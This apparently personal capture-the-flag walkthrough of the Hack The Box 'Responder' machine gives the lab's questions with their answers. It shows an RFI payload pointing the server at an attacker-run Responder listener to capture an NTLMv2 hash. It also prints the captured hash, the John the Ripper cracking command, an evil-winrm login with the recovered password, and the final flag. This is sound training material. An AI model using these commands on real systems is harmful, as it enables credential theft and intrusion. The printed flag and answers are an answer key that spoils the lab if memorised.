> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/starting-point-machines/tier-1-machines/responder.md).

# Responder

{% file src="/files/S01J1don9W9qtsIfs3Hs" %}

**Task 1**

When visiting the web service using the IP address, what is the domain that we are being redirected to?

**Answer:**

* Open web browser and input http\://\[IP]
* Redirects you to the subdomain "unika.htb"

**Task 2**

Which scripting language is being used on the server to generate webpages?

**Answer:**

* Chances are the URL will not respond.
* You need to run the following command to add the URL associated the IP address.

```
echo "[IP] unika.htb" | sudo tee -a /etc/hosts
```

* This will make the website available.
* After this click on another link on the main page.
* Check the URL and you will notice that the index.php is brought up.&#x20;
* Therefore the scripting language used is "php"

**Task 3**

What is the name of the URL parameter which is used to load different language versions of the webpage?

**Answer:**

* Click on the language link in the upper right hand corner and pick on french.
* Now look at the URL and you will notice that a parameter has been specified named "page" which specifies the language.

**Task 4**

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

**Answer:**

* The answer is "../../../../../../../../windows/system32/drivers/etc/hosts"

**Task 5**

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

**Answer:**

* The answer is "//10.10.14.6/somefile"

**Task 6**

What does NTLM stand for?

**Answer:**

* New Technology Lan Manager

**Task 7**

Which flag do we use in the Responder utility to specify the network interface?

**Answer:**

* First, run the following to see what options are available with responder:

```
responder -h
```

* Reading through the documentation, the flag is "-I"

**Task 8**

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.

**Answer:**

* The answer is "John the ripper"

**Task 9**

What is the password for the administrator user?

**Answer:**

* Start by initiating Responder with the command below:

```
sudo responder -I tun0
```

* This will start a responder listener. You can specify your IP address at the end.
* At the bottom of the feedback you should find a "Responder IP" value. In this case the one it gave me was 10.10.14.40 but this could be different.
* Back on the browser to the webpage, we want perform a Remote File Include (RFI) by inputting the following:

```
http://unika.htb/?page=//10.10.14.40/somefile
```

* You will input the IP given to your from responder here so keep an eye on it.
* Once you hit enter the page won't resolve but if you go back to the terminal with the Responder Listener, you will see that it captured an Authentication.

<figure><img src="/files/mLbIFjZTm1Gv6Z4wxOpm" alt=""><figcaption></figcaption></figure>

* Now we need to take that Authentication it gave us and feed it into John the Ripper to see if it can match it up with a password to the Administrator account.
* Open a terminal window and run the following to save the hash in a text file:

{% code overflow="wrap" %}

```
echo "Administrator::RESPONDER:cc89ef09810be846:8DD511C596718C4C136B84A19916E6DD:010100000000000000E2FC902E59D9010AEA90B992FB7CC100000000020008004C005A0044004E0001001E00570049004E002D00480057005100490035003900590036004F003000370004003400570049004E002D00480057005100490035003900590036004F00300037002E004C005A0044004E002E004C004F00430041004C00030014004C005A0044004E002E004C004F00430041004C00050014004C005A0044004E002E004C004F00430041004C000700080000E2FC902E59D90106000400020000000800300030000000000000000100000000200000C203A6B4D9A1F9D91DCAB2EBECB0C7696F75D0CBEC1A085F2584334D5E69FAF90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340030000000000000000000" > hash.txt
```

{% endcode %}

* Next is to run it through John the Ripper with the following:

```
john -w==/usr/share/wordlists/rockyou.txt hash.txt
```

* This should return a password of "badminton"

**Task 10**

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

**Answer:**

* Start by making sure wvil-winrm is installed:

```
sudo gem install evil-winrm
```

* Then run the following command to connect to the windows machine:

```
evil-winrm -i [TARGET IP] -u administrator -p badminton
```

* We should now be logged into the windows account.
* If you open a new tab on terminal and run an nmap scan on all ports, you will find that port "5985" is open and running wsman. This is the answer.

**Submit Flag:**

* From the previous task we should be logged into the windows system. From here we can list out the directories with the "dir" command.
* I browsed around and found the flag.txt file in C:\Users\mike\Desktop\flag.txt
* Use the "type" command to see the flag.
* The flag is "ea81b7afddd03efaa0945333ed147fac"
